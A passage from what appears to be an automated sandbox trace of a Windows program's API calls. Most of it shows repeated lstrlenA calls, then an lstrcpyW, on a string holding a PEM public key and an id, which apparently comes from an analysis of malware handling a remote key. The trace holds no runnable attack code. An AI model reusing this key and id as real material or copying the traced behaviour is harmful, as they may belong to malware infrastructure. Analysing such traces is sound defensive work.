KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.368] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0160.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a056f0 | out: hHeap=0x2c0000) returned 1 [0160.369] lstrlenA (lpString="-----BEGIN PUBLIC 